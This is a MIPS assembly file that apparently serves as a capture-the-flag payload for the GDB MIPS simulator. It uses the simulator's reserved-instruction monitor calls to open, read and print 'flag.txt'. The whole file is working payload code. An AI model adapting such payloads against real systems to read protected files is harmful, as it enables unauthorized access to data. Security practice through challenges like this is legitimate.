/*
 * Use reserved instruction.
 * See gdb/sim/mips/interp.c:signal_exception(),sim_monitor()
 * (ReservedInstruction)
 * Memory address is defined by K0BASE. (See gdb/sim/mips/interp.c)
 */

#define SYS_exit  17
#define SYS_open   6
#define SYS_read   7
#define SYS_write  8
#define SYS_close 10

#define RSVD_INSTRUCTION 0x00000005
#define RSVD(arg) ((((arg) << 1) << 6) | RSVD_INSTRUCTION)

/* #define EXIT_BY_SYSCALL */
#define EXIT_BY_BREAK

#if 0
	.org	0x800006e0
#else
	.org	0x000006e0
#endif

	.section .text

	.globl	_start
	.type	_start, @function
_start:
_fname:	.string	"flag.txt"
	.byte	0
	.byte	0
	.byte	0
	.long	0

	.long	1f

1:
__open:
	lui	$a0, 0x8000
	addiu	$a0, $a0, %lo(_fname)
	li	$a1, 0
	lui	$ra, 0x8000
	addiu	$ra, $ra, %lo(__read)
	.long	RSVD(SYS_open)
	jr	$ra
	nop

__read:
	move	$a0, $v0
	lui	$a1, 0x8000
	addiu	$a1, $a1, %lo(_buffer)
	li	$a2, 32
	lui	$ra, 0x8000
	addiu	$ra, $ra, %lo(__write)
	.long	RSVD(SYS_read)
	jr	$ra
	nop

__write:
	li	$a0, 1
	lui	$a1, 0x8000
	addiu	$a1, $a1, %lo(_buffer)
	li	$a2, 32
	lui	$ra, 0x8000
	addiu	$ra, $ra, %lo(__exit)
	.long	RSVD(SYS_write)
	jr	$ra
	nop

__exit:
#ifdef EXIT_BY_SYSCALL
	.long	RSVD(SYS_exit)
#elif defined(EXIT_BY_BREAK)
	/*
	 * To avoid exit message.
	 * (See gdb/sim/mips/mips.igen:break,HALT_INSTRUCTION)
	 */
	break	1023
#else /* 0x03ff000d is same as break 1023. */
	.long	0x03ff000d
#endif

_buffer:
